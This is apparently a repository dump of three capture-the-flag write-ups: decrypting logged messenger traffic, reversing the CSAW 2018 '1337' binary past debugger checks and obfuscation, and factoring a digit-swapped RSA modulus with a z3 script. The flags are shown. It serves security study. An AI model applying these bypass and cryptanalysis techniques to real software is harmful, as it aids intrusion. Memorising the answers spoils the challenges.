52 |     byte[] ivBytes = sha256Hmac(agreement, "WhisperSystems".getBytes(), 16);
53 |     Cipher localCipher = getCipherInstance();
54 |     localCipher.init(1, new SecretKeySpec(keyBytes, "AES"), new IvParameterSpec(ivBytes));
55 |     return new ECKey(localCipher.doFinal(paramStringStorage.getStoredValue().getBytes()), shiftCounter, paramPublicKeyStorage.getSeed(), localCurve25519KeyPair.getPublicKey());
56 |   }
57 | ```
58 | So, we aim for a AES decrypt. What we need is:
59 |  * IV
60 |  * Key
61 |  * Encrypted data (obviously, but its in the log of Bob)
62 |  * MODE and Padding Method (given by AES/CBC/PKCS5Padding)
63 | 
64 | The Key is build via:
65 | ```
66 | shiftCounter += 1L;
67 | byte[] keyBytes = sha256Hmac(getIVShifted(shiftCounter), "WhisperSystems".getBytes(), 16);
68 | ```
69 | The getIVShifted() performs some XOR and ROR Operations with the first agreement that this conversation had. Keep that in mind! But besides that pretty easy, isn't it? The IV is a little bit more complicated:
70 | ```
71 | byte[] agreement = ((Curve25519)curve25519Obj).calculateAgreement(paramPublicKeyStorage.getMSGPubKey(), localCurve25519KeyPair.getPrivateKey());
72 | byte[] ivBytes = sha256Hmac(agreement, "WhisperSystems".getBytes(), 16);
73 | ```
74 | So the iv calculates from the agreement between KP_MSG and KP_ENC. We don't have those key pairs :( But what we do have is the log of the agreement after "/session/ephemeral/shared/" . So all we need for a AES decrypt is:
75 |  * First agreement ever in this conversation (logged in session/est/base/)
76 |  * Agreement of the current message (logged in ephemeral/shared/)
77 |  * Number of the current message = shiftCounter (logged in the log of Bob)
78 | 
79 | And we got all those information! So i wrote a Java program that performs the decryption. It wasn't as simple as it sounds, since the sha256Hmac-Function wasn't decompiled properly. It seems that dex2jar doesn't like abstract classes with inherited classes, maybe it was some kind of additional obfuscation. Anyway, here are the decrypted messages from Alice to Bob:
80 | ```
81 | Hello, bobby :)
82 | What du U think about new messenger`s protocol?..
83 | Wha..?
84 | Dant warry, I am the one who checked it. It is safe for our deal.
85 | So take it --- h4ck1t{X}
86 | X=1_b3tT3r_w1Ll_b3_u5iNg_AX0L0TL```
87 | ```
88 | 
89 | The Java Source is attached, together with my "cleaned" decompiled sources .
90 | 
91 | Flag: h4ck1t{1_b3tT3r_w1Ll_b3_u5iNg_AX0L0TL}
92 | 
93 | 
94 |   
95 | 
96 | 


--------------------------------------------------------------------------------
/2018/csaw 2018 quals/1337/README.md:
--------------------------------------------------------------------------------
  1 | # 1337 (Reversing 500)
  2 | 
  3 | There was a quite interesting, but also frustrating windows reversing challenge at CSAW quals 2018. Only 4 teams solved the task in time and it got upgraded from 300 to 500 points since it got no solves after more than a day. Unfortunately, my team ALLES! didn’t solve it in time because of a tiny bug in our implementation. That mistake cost us the first place, but anyways, heres the writeup:
  4 | 
  5 | As usual in windows reversing the file gets loaded with CFF Explorer to obtain some standard information like the filetype (32 bit), suspicious sections (`UPX0` and `UPX1`, both red herrings) and an overview of the imports (`KERNEL32.dll` and `USER32.dll`, nothing special). Note that `GetProcAddr` and `LoadLibraryExA` is imported, so there are probably more APIs imported at runtime…
  6 | 
  7 | Loading the file in IDA we inspect the main method. It runs in an endless loop, which is quite unusual for a console application since only UI applications use a message loop. The code is a mess, probably also due to the various obfuscations we come around later on. Let’s dive in and begin with some dynamically analysis, since the static code is a mess.
  8 | 
  9 | Starting the 1337.exe with my favorite debugger x64dbg we notice a “Nope”-MessageBox. A debugger detection! Luckily only a simple one, we can hide the debugger in the PEB data (x64dbg can do this for us) and all debugger checks are bypassed. Tracing the `IsDebuggerPresent()`-Call (which actually uses the PEB for the check), we can find a call from the main function to this debugger check function (`0x00510AF0`). Let’s trace the user input: Let the program run until it asks for the console input. Suspend the main thread and trace the stack till we find a return to the 1337.exe
 10 | 
 11 | ![](return.png)
 12 | 
 13 | `ReadConsoleA` sounds good, but its only an internal API call. We are interested in the call of the 1337.exe module, which is actually a `ReadFile` call with the console handle.
 14 | 
 15 | ![](consoleread.png)
 16 | 
 17 | Knowing this location, we can trace the `lpBuffer` variable. It gets copied to a string (`0x00524A71`) and is returned. Eventually we arrive at `0x005755E3` where 8 bytes of input is pushed to the stack and the function `0x00528100` is called.
 18 | 
 19 | ![](call.png)
 20 | 
 21 | We handle this function as a black box for now. There is a 8 byte userinput segment and 8 byte output is returned in the registers EAX and EDX. Actually it’s a 64 bit number that gets passed in two registers. Keep in mind the 32 Bit context ;) This function gets called multiple times, passing all the 8 byte separated userinput to this black box function. Tracing the output of this black box function (memory BPs) we finally arrive at 0x00577098, `call eax`.
 22 | 
 23 | ![](calleax.png)
 24 | 
 25 | The first argument of this function call (as seen in the stack) is an address `X`, the second argument is address `X+1`. The third argument is simply a `1`, and static! The first argument is actually a byte of the output of the black box function, the second argument is static and comes from a decrypted string buffer. Lets analyze the function that gets called (`0x005115C4`).
 26 | 
 27 | The pseudocode of this function is 1900 lines, sweet! But we’re lucky, the third argument is always 1. And so the function reduces to a few lines:
 28 | 
 29 | ![](memcmp1.png)
 30 | ![](memcmp2.png)
 31 | 
 32 | A few lines later, tracing the value of `EBX`:
 33 | 
 34 | ![](ebxtrace.png)
 35 |  
 36 | The string “WriteProcessMemory” (another red herring) is used to calculate a static byte value: `0x12C`. And this value is compared to `ECX`, which should match. If we toggle the `ZF` to negate the comparison, we jump to the “good flag” function: 
 37 | 
 38 | ![](goodflag.png)
 39 |  
 40 | Cool, task solved! Nah not really, we have to find the matching values for the static buffer. And for this, we have to analyze the black box functions which transforms the user input to an “hash” that is compared with the static buffer. 
 41 | We’d like to use IDA pseudocode to analyze this input transformation function, but a clever obfuscation technique hinders IDA to do so:
 42 |  
 43 |  ![](obfuscation.png)
 44 |  
 45 | First all registers are saved, then the “function” is called, basically pushing the return address to the stack and jumping to the next line. The return address is popped from the stack, increased and pushed back, now pointing to the instruction right before the popad. A ret jumps to this place. So those lines basically do nothing, but disturb the stack analysis of IDA. If we NOP all those instructions, we get nice pseudocode:
 46 | 
 47 | ![](pseudocodehash.png)
 48 | 
 49 | All this code reduces to:
 50 | ```python
 51 | def algo2(power):
 52 |     base = 5
 53 |     accum = 1
 54 |     p = power & (0x3FFFFFFFFFFFFFFF)
 55 |     highbit = power >> (30+32)
 56 |     while True:
 57 |         if p & 1:
 58 |             accum = multip(base, accum)
 59 |         p = p >> 1
 60 |         base = multip(base, base)
 61 |         if (p <= 2):
 62 |             break;
 63 |     return accum + highbit - 1
 64 | ```
 65 | In an even simpler form the calculation is reduced to: `pow(5,INPUT, 2^64)`. Lets verify this thesis with some input (we take “AAAABBBB” = 0x4141414142424242):
 66 | ```
 67 | >>> hex(pow(5,0x4242424241414141,2**64))
 68 | '0xb4f541a4c7960705L'
 69 | ```
 70 | ![](match.png)
 71 | 
 72 | We got the right values stored in our registers! This means we have to solve a discrete logarithmic problem in the form a^x mod N = b with a=5, N = 2^64 and b given from the comparison buffer. Sage can solve this problem effectively and it worked well for our generated input. 
 73 | ```python
 74 | def reversealgo(inp):
 75 |     F = Integers(2**64)
 76 |     rev = F(inp+1).log(5) + 2**63 - 2**62
 77 |     assert algo(int(rev)) == inp
 78 |     return rev
 79 | ```
 80 | But the static comparison buffer values were: 
 81 | ```
 82 | 0xbeb9e408e58575b0
 83 | 0xb8f8437f04f80044
 84 | 0xc227df7146b09474
 85 | ```
 86 | Notice how all of them are even numbers, which can’t be calculated using `5^x` for any `x`! We simplified the algorithm too much and missed that the last to bits of the user input is stored and appended to the output (highbit in the python code). This way even numbers are possible. Without this mechanism those numbers wouldn’t be unique, as seen in this example:
 87 | ```
 88 | >>> hex(pow(5,0x3333333312345678,2**64))
 89 | '0xab0057c4f85cb421L'
 90 | >>> hex(pow(5,0x7333333312345678,2**64))
 91 | '0xab0057c4f85cb421L'`
 92 | ```
 93 | But the algorithm of the 1337.exe handles the first case as `0xab0057c4f85cb420`. Using this knowledge, we could simply add a `1` to the static input buffer, solve the discrete log problem and discard the MSB of the result, yielding the searched input.
 94 | 
 95 | ![](flag.png)
 96 | 
 97 | There were various other obfuscation strategies used in this binary. Parts of functions were just NOPs for 200 instructions, other functions called the very same function multiple times in a normal control flow. And the static comparison buffer was depended on the user input length! That means if you just tested with a 9 character input you got a slightly different comparison buffer than with a 17-character input. The real comparison buffer was only decrypted when the user provided a 24-character input.
 98 | Furthermore, the `LoadStringA` function (which was used for the string decryption) returned a proper buffer only if the string was loaded in cp1255 encoding. This hint was released later on.
 99 | 
100 | 
101 | 
102 | 
103 | 


--------------------------------------------------------------------------------
/2019/midnightsunctf/open-gyckel-krypto/open-gyckel-krypto.md:
--------------------------------------------------------------------------------
  1 | # Open Gyckel Krypto
  2 | - Tags: Crypto, DPA
  3 | - Points: 226
  4 | - Solves: 56
  5 | 
  6 | ## Challenge
  7 | >Primes are fun, don't google translate me bro 
  8 | 
  9 | We get a textfile with python code:
 10 | ```python
 11 | while True:
 12 |     p = next_prime(random.randint(0, 10**500))
 13 |     if len(str(p)) != 500:
 14 |         continue
 15 |     q = Integer(int(str(p)[250:] + str(p)[:250]))
 16 |     if q.is_prime():
 17 |         break
 18 | 
 19 | >> p * q
 20 | 6146024643941503757217715363256725297474582575057128830681803952150464985329239705861504172069973746764596350359462277397739134788481500502387716062571912861345331755396960400668616401300689786263797654804338789112750913548642482662809784602704174564885963722422299918304645125966515910080631257020529794610856299507980828520629245187681653190311198219403188372517508164871722474627810848320169613689716990022730088459821267951447201867517626158744944551445617408339432658443496118067189012595726036261168251749186085493288311314941584653172141498507582033165337666796171940245572657593635107816849481870784366174740265906662098222589242955869775789843661127411493630943226776741646463845546396213149027737171200372484413863565567390083316799725434855960709541328144058411807356607316377373917707720258565704707770352508576366053160404360862976120784192082599228536166245480722359263166146184992593735550019325337524138545418186493193366973466749752806880403086988489013389009843734224502284325825989
 21 | >> pow(m, 65537, p * q)
 22 | 3572030904528013180691184031825875018560018830056027446538585108046374607199842488138228426133620939067295245642162497675548656988031367698701161407333098336631469820625758165691216722102954230039803062571915807926805842311530808555825502457067483266045370081698397234434007948071948000301674260889742505705689105049976374758307610890478956315615270346544731420764623411884522772647227485422185741972880247913540403503772495257290866993158120540920089734332219140638231258380844037266185237491107152677366121632644100162619601924591268704611229987050199163281293994502948372872259033482851597923104208041748275169138684724529347356731689014177146308752441720676090362823472528200449780703866597108548404590800249980122989260948630061847682889941399385098680402067366390334436739269305750501804725143228482932118740926602413362231953728010397307348540059759689560081517028515279382023371274623802620886821099991568528927696544505357451279263250695311793770159474896431625763008081110926072287874375257
 23 | ```
 24 | 
 25 | Google translation of the challenge title: `Open-fun-crypto`
 26 | 
 27 | ## Solution
 28 | The script is easily identifiable as RSA, with a twist on the prime generation. To break it, we need to factor the modulus `n=p*q`.
 29 | Both p and q are 500 digits, thus n is 1000. This is far to long for normal factoring algorithms.
 30 | But notice that q is a 'swapped' version of p, ie we look at its representation in Base10 and swap the top and bottom half.
 31 | 
 32 | To solve the challenge we need to somehow represent this swapping as a mathematical operation. The easiest way to do this, is to define the bottom and top parts of p `a` and `b`. Doing this we can say
 33 | ```
 34 | p = 10^250 * a + b
 35 | q = 10^250 * b + a
 36 | n = p*q = 10^500 * a*b + 10^250 * (a*a + b*b) + a * b
 37 | ```
 38 | Now we have to pay close attention to the size of the sum terms:
 39 | ```
 40 | a                      250 digits
 41 | b                      250 digits
 42 | a+b                    250 or 251 digits (overflow by 1)
 43 | a*b                    499 or 500 digits
 44 | 10^500 * a*b:          499 or 500 digits, shifted by 500 0's
 45 | 10^250 * (a*a + b*b)   499 to 501 digits, shifted by 250 0's
 46 | ```
 47 | Thus the sum above can be seen as
 48 | 
 49 | |          n          |   top250 |  -------  |  -------   | bottom250|
 50 | |---------------------|:--------:|:---------:|:----------:|:--------:|
 51 | |    `10^500 *a*b`    | *A*      | *B*       | 0          | 0        |
 52 | | `10^250 *(a*a+b*b)` |   0 or 1 | *C*       | *D*        | 0        |
 53 | |       ` a*b `       |   0      |   0       | *A*        | *B*      |
 54 | 
 55 | Notice that we can calculate `a*b` by taking the top 250 and bottom 250 digits of n. We just have to be careful to check if `(a*a+b*b)` has overflowed, and thus adds 1 to the top part. Checking the two solutions, we see that for the given `n` it has indeed done so. Now knowing `a*b` we can also get `a*a+b*b` from `n` as:
 56 | ```
 57 | a*a+b*b = 10^-250 * (n - a*b - 10^500*a*b)
 58 | ```
 59 | 
 60 | This gives us a system of equations:
 61 | ```
 62 | a*b = c1
 63 | a*a+b*b = c2
 64 | ```
 65 | 
 66 | Anw while this can easily be transformed into a quadratic equation by hand, we are lazy and use z3. In python this looks like:
 67 | ```python
 68 | from z3 import *
 69 | from Crypto.Util import number as num
 70 | 
 71 | e = 65537
 72 | n = 6146024643941503757217715363256725297474582575057128830681803952150464985329239705861504172069973746764596350359462277397739134788481500502387716062571912861345331755396960400668616401300689786263797654804338789112750913548642482662809784602704174564885963722422299918304645125966515910080631257020529794610856299507980828520629245187681653190311198219403188372517508164871722474627810848320169613689716990022730088459821267951447201867517626158744944551445617408339432658443496118067189012595726036261168251749186085493288311314941584653172141498507582033165337666796171940245572657593635107816849481870784366174740265906662098222589242955869775789843661127411493630943226776741646463845546396213149027737171200372484413863565567390083316799725434855960709541328144058411807356607316377373917707720258565704707770352508576366053160404360862976120784192082599228536166245480722359263166146184992593735550019325337524138545418186493193366973466749752806880403086988489013389009843734224502284325825989
 73 | c = 3572030904528013180691184031825875018560018830056027446538585108046374607199842488138228426133620939067295245642162497675548656988031367698701161407333098336631469820625758165691216722102954230039803062571915807926805842311530808555825502457067483266045370081698397234434007948071948000301674260889742505705689105049976374758307610890478956315615270346544731420764623411884522772647227485422185741972880247913540403503772495257290866993158120540920089734332219140638231258380844037266185237491107152677366121632644100162619601924591268704611229987050199163281293994502948372872259033482851597923104208041748275169138684724529347356731689014177146308752441720676090362823472528200449780703866597108548404590800249980122989260948630061847682889941399385098680402067366390334436739269305750501804725143228482932118740926602413362231953728010397307348540059759689560081517028515279382023371274623802620886821099991568528927696544505357451279263250695311793770159474896431625763008081110926072287874375257
 74 | 
 75 | n_str = str(n)
 76 | L = len(n_str) // 4
 77 | 
 78 | top    = int(n_str[:L]) - 1 # overflow!
 79 | bottom = int(n_str[-L:])
 80 | 
 81 | c1 = (10**L) * top + bottom
 82 | c2 = (n - c1 - c1 * 10**(2*L)) // 10**L
 83 | 
 84 | s = Solver()
 85 | a_ = Int('a')
 86 | b_ = Int('b')
 87 | s.add(c1 == a_ * b_)
 88 | s.add(c2 == a_**2 + b_**2)
 89 | s.add(a_>0) # we want positive solutions
 90 | s.add(b_>0)
 91 | 
 92 | assert s.check() == sat, 'No solution found'
 93 | 
 94 | # reconstruct p and q
 95 | a = s.model()[a_].as_long()
 96 | b = s.model()[b_].as_long()
 97 | p = 10**L*a + b
 98 | q = 10**L*b + a
 99 | 
100 | assert n == p * q, 'Wrong solution found!'
101 | 
102 | # get plaintext
103 | phi = (p-1)*(q-1)
104 | d = num.inverse(e, phi)
105 | m = pow(c, d, n)
106 | 
107 | print (num.long_to_bytes(m))
108 | ```
109 | 
110 | which gives us the flag as
111 | ```
112 | midnight{w3ll_wh47_d0_y0u_kn0w_7h15_15_4c7u4lly_7h3_w0rld5_l0n6357_fl46_4nd_y0u_f0und_17_50_y0u_5h0uld_b3_pr0ud_0f_y0ur53lf_50_uhmm_60_pr1n7_7h15_0n_4_75h1r7_0r_50m37h1n6_4nd_4m4z3_7h3_p30pl3_4r0und_y0u}
113 | ```


--------------------------------------------------------------------------------